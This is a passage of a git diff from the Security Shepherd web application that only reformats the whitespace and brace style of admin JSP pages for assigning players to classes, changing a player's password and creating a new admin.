-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showClasses = false;
-
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	// Getting Session Variables
+	//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+	
+	String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+	String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+	String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+	String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+	String ApplicationRoot = getServletContext().getRealPath("");
+	boolean showClasses = false;
+	
+	ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+	try
+	{
+		showClasses = classList.next();
+	}
+	catch(SQLException e)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+		showClasses = false;
+	}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Assign Players</h1>
-    <div id="assignDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Please select the users you would like to assign and the class
-                that you would like to assign them to.</p>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td>
-                        <p>Class:</p>
-                    </td>
-                    <td><select id="selectClass">
-                        <option value="">Unassigned Players</option>
-                        <%
-                            if (showClasses) {
-                                try {
-                                    do {
-                                        String classId = Encode.forHtml(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=classId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                    classList.first();
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                    showClasses = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <p>Select the players that you want to assign here</p>
-                        <div id="playerSelect">
-                            <center>
-                                <select id='playerId' style='width: 300px;' multiple>
-                                    <%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
-                                </select>
-                            </center>
-                        </div>
-                    </td>
-                </tr>
-                <tr>
-                    <td>Assign To:</td>
-                    <td><select id="classId">
-                        <option value="" id="nullClassOption">Unassigned Players</option>
-                        <%
-                            if (showClasses) {
-                                try {
-                                    do {
-                                        String classId = Encode.forHtml(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=classId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                    showClasses = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Assign Players"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Assign Players</h1>
+	<div id="assignDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Please select the users you would like to assign and the class
+				that you would like to assign them to.</p>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td>
+						<p>Class:</p>
+					</td>
+					<td><select id="selectClass">
+							<option value="">Unassigned Players</option>
+							<%
+									if(showClasses)
+									{
+										try
+										{
+											do
+											{
+												String classId = Encode.forHtml(classList.getString(1));
+												String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+												%>
+							<option value="<%=classId%>"><%=classYearName%></option>
+							<%
+											}
+											while(classList.next());
+											classList.first();
+										}
+										catch(SQLException e)
+										{
+											ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+											showClasses = false;
+										}
+									}
+								%>
+					</select></td>
+				</tr>
+				<tr>
+					<td colspan="2">
+						<p>Select the players that you want to assign here</p>
+						<div id="playerSelect">
+							<center>
+								<select id='playerId' style='width: 300px;' multiple>
+									<%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
+								</select>
+							</center>
+						</div>
+					</td>
+				</tr>
+				<tr>
+					<td>Assign To:</td>
+					<td><select id="classId">
+							<option value="" id="nullClassOption">Unassigned Players</option>
+							<%
+									if(showClasses)
+									{
+										try
+										{
+											do
+											{
+												String classId = Encode.forHtml(classList.getString(1));
+												String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+												%>
+							<option value="<%=classId%>"><%=classYearName%></option>
+							<%
+											}
+											while(classList.next());
+										}
+										catch(SQLException e)
+										{
+											ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+											showClasses = false;
+										}
+									}
+								%>
+					</select></td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Assign Players" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#selectClass").change(function () {
-        refreshClassList()
-    });
-
-    function refreshClassList() {
-        var theCsrfToken = $('#csrfToken').val();
-        $("#playerSelect").slideUp("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "getPlayersByClass",
-                data: {
-                    classId: $("#selectClass option:selected").val(),
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingDiv").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    if (ajaxCall.responseText == '') {
-                        $("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
-                    } else if (ajaxCall.responseText == 'fail') {
-                        $("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
-                    } else {
-                        $("#playerSelect").html("<center><select id='playerId' style='width: 300px;' multiple>" + ajaxCall.responseText + "</select></center>");
-                    }
-                } else {
-                    $("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                    $("#badData").show("slow");
-                }
-                $("#playerSelect").slideDown("slow");
-            });
-        });
-    }
-
-    $("#theForm").submit(function () {
-        //Get Data
-        var theClass = $("#classId").val();
-        var theCsrfToken = $('#csrfToken').val();
-        var thePlayers = $("#playerId").val();
-        //Validation
-        if (thePlayers == null) {
-            $('#badData').html("<p><strong><font color='red'>All fields are required</font></strong></p>");
-        } else {
-            //Show and Hide Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#assignDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "assignPlayers",
-                    data: {
-                        classId: theClass,
-                        players: thePlayers,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    console.log('Showing Form');
-                    $("#assignDiv").slideDown("slow");
-                    $('html, body').animate({
-                        scrollTop: $("#resultDiv").offset().top
-                    }, 1000);
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#selectClass").change(function () {
+		refreshClassList()
+	});
+	
+	function refreshClassList() {
+		var theCsrfToken = $('#csrfToken').val();
+		$("#playerSelect").slideUp("slow", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "getPlayersByClass",
+				data: {
+					classId: $("#selectClass option:selected").val(),
+					csrfToken: theCsrfToken
+				},
+				async: false
+			});
+			$("#loadingDiv").hide("fast", function(){
+				if(ajaxCall.status == 200)
+				{
+					if(ajaxCall.responseText == '')
+					{
+						$("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
+					}
+					else if(ajaxCall.responseText == 'fail')
+					{
+						$("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
+					}
+					else
+					{
+						$("#playerSelect").html("<center><select id='playerId' style='width: 300px;' multiple>" + ajaxCall.responseText + "</select></center>");
+					}
+				}
+				else
+				{
+					$("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					$("#badData").show("slow");
+				}
+				$("#playerSelect").slideDown("slow");
+			});
+		});
+	}
+	
+	$("#theForm").submit(function(){
+		//Get Data
+		var theClass = $("#classId").val();
+		var theCsrfToken = $('#csrfToken').val();
+		var thePlayers = $("#playerId").val();
+		//Validation
+		if (thePlayers == null)
+		{
+			$('#badData').html("<p><strong><font color='red'>All fields are required</font></strong></p>");
+		}
+		else
+		{
+			//Show and Hide Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#assignDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "assignPlayers",
+					data: {
+						classId: theClass,
+						players: thePlayers, 
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					console.log('Showing Form');
+					$("#assignDiv").slideDown("slow");
+					$('html, body').animate({
+				        scrollTop: $("#resultDiv").offset().top
+				    }, 1000);
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/changeUserPassword.jsp b/src/main/webapp/admin/userManagement/changeUserPassword.jsp
index 48cedd261..831be9a31 100644
--- a/src/main/webapp/admin/userManagement/changeUserPassword.jsp
+++ b/src/main/webapp/admin/userManagement/changeUserPassword.jsp
@@ -1,211 +1,243 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: changeUserPassword.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: changeUserPassword.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(upgradePlayers.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(upgradePlayers.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
 
 //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
 
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Change Player Password</h1>
-    <div id="resetPasswordDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>You can use this function to update a users password. This
-                password will be temporary, and they will be forced to change it
-                upon sign in.</p>
-            <div id="badData"></div>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td colspan="2">
-                        <p>Pick the class of the player you wish to modify</p>
-                        <center>
-                            <select id="selectClass" style="width: 300px;">
-                                <option value="">Unassigned Players</option>
-                                <%
-                                    if (showClasses) {
-                                        try {
-                                            do {
-                                                String classId = Encode.forHtml(classList.getString(1));
-                                                String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                                %>
-                                <option value="<%=classId%>"><%=classYearName%>
-                                </option>
-                                <%
-                                            }
-                                            while (classList.next());
-                                            classList.first();
-                                        } catch (SQLException e) {
-                                            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                            showClasses = false;
-                                        }
-                                    }
-                                %>
-                            </select>
-                        </center>
-                    </td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <p>Select the player that you want to assign here</p>
-                        <div id="playerSelect">
-                            <center>
-                                <select id='playerId' style='width: 300px;'>
-                                    <%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
-                                </select>
-                            </center>
-                            <br>
-                        </div>
-                    </td>
-                </tr>
-                <tr>
-                    <td>New Password:</td>
-                    <td><input type="password" style='width: 300px'
-                               id="newPassword"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Update Player Password"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Change Player Password</h1>
+	<div id="resetPasswordDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>You can use this function to update a users password. This
+				password will be temporary, and they will be forced to change it
+				upon sign in.</p>
+			<div id="badData"></div>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td colspan="2">
+						<p>Pick the class of the player you wish to modify</p>
+						<center>
+							<select id="selectClass" style="width: 300px;">
+								<option value="">Unassigned Players</option>
+								<%
+								if(showClasses)
+								{
+									try
+									{
+										do
+										{
+											String classId = Encode.forHtml(classList.getString(1));
+											String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+											%>
+								<option value="<%=classId%>"><%=classYearName%></option>
+								<%
+										}
+										while(classList.next());
+										classList.first();
+									}
+									catch(SQLException e)
+									{
+										ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+										showClasses = false;
+									}
+								}
+								%>
+							</select>
+						</center>
+					</td>
+				</tr>
+				<tr>
+					<td colspan="2">
+						<p>Select the player that you want to assign here</p>
+						<div id="playerSelect">
+							<center>
+								<select id='playerId' style='width: 300px;'>
+									<%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
+								</select>
+							</center>
+							<br>
+						</div>
+					</td>
+				</tr>
+				<tr>
+					<td>New Password:</td>
+					<td><input type="password" style='width: 300px'
+						id="newPassword" /></td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Update Player Password" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#selectClass").change(function () {
-        var theCsrfToken = $('#csrfToken').val();
-        var ajaxCall = $.ajax({
-            type: "POST",
-            url: "getPlayersByClass",
-            data: {
-                classId: $("#selectClass option:selected").val(),
-                csrfToken: theCsrfToken
-            },
-            async: false
-        });
-        if (ajaxCall.status == 200) {
-            $("#playerSelect").hide("fast", function () {
-                if (ajaxCall.responseText == '') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
-                } else if (ajaxCall.responseText == 'fail') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
-                } else {
-                    $("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
-                }
-                $("#playerSelect").show("slow");
-            });
-        } else {
-            $("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-        }
-    });
-
-    $("#theForm").submit(function () {
-        //Get Data
-        var theCsrfToken = $('#csrfToken').val();
-        var theNewPassword = $('#newPassword').val();
-        var thePlayers = $("#playerId").val();
-        //Validation
-        if (thePlayers == null) {
-            $('#badData').html("<p><strong><font color='red'>Please select a player to update.</font></strong></p>");
-        } else if (theNewPassword.length < 8) {
-            $('#badData').html("<p><strong><font color='red'>Password must be at least 8 characters long.</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#resetPasswordDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "changeUserPassword",
-                    data: {
-                        player: thePlayers,
-                        password: theNewPassword,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#resetPasswordDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#selectClass").change(function () {
+		var theCsrfToken = $('#csrfToken').val();
+		var ajaxCall = $.ajax({
+			type: "POST",
+			url: "getPlayersByClass",
+			data: {
+				classId: $("#selectClass option:selected").val(),
+				csrfToken: theCsrfToken
+			},
+			async: false
+		});
+		if(ajaxCall.status == 200)
+		{
+			$("#playerSelect").hide("fast", function(){
+				if(ajaxCall.responseText == '')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
+				}
+				else if(ajaxCall.responseText == 'fail')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
+				}
+				else
+				{
+					$("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
+				}
+				$("#playerSelect").show("slow");
+			});
+		}
+		else
+		{
+			$("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+		}
+	});
+	
+	$("#theForm").submit(function(){
+		//Get Data
+		var theCsrfToken = $('#csrfToken').val();
+		var theNewPassword = $('#newPassword').val();
+		var thePlayers = $("#playerId").val();
+		//Validation
+		if (thePlayers == null)
+		{
+			$('#badData').html("<p><strong><font color='red'>Please select a player to update.</font></strong></p>");
+		}
+		else if (theNewPassword.length < 8)
+		{
+			$('#badData').html("<p><strong><font color='red'>Password must be at least 8 characters long.</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#resetPasswordDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "changeUserPassword",
+					data: {
+						player: thePlayers,
+						password: theNewPassword,
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#resetPasswordDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/createNewAdmin.jsp b/src/main/webapp/admin/userManagement/createNewAdmin.jsp
index d68961473..64c97306a 100644
--- a/src/main/webapp/admin/userManagement/createNewAdmin.jsp
+++ b/src/main/webapp/admin/userManagement/createNewAdmin.jsp
@@ -1,196 +1,221 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: createNewAdmin.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: createNewAdmin.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(createNewAdmin.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(createNewAdmin.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String errorMessage = new String();
-            String newUserName = new String();
-            String userAddress = new String();
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+String errorMessage = new String();
+String newUserName = new String();
+String userAddress = new String();
 
-            if (ses.getAttribute("errorMessage") != null) {
-                try {
-                    errorMessage = Encode.forHtml(ses.getAttribute("errorMessage").toString());
-                    newUserName = Encode.forHtmlAttribute(ses.getAttribute("userName").toString());
-                    userAddress = Encode.forHtmlAttribute(ses.getAttribute("userAddress").toString());
-                    ses.removeAttribute("userName");
-                    ses.removeAttribute("userAddress");
-                    ses.removeAttribute("errorMessage");
-                } catch (Exception e) {
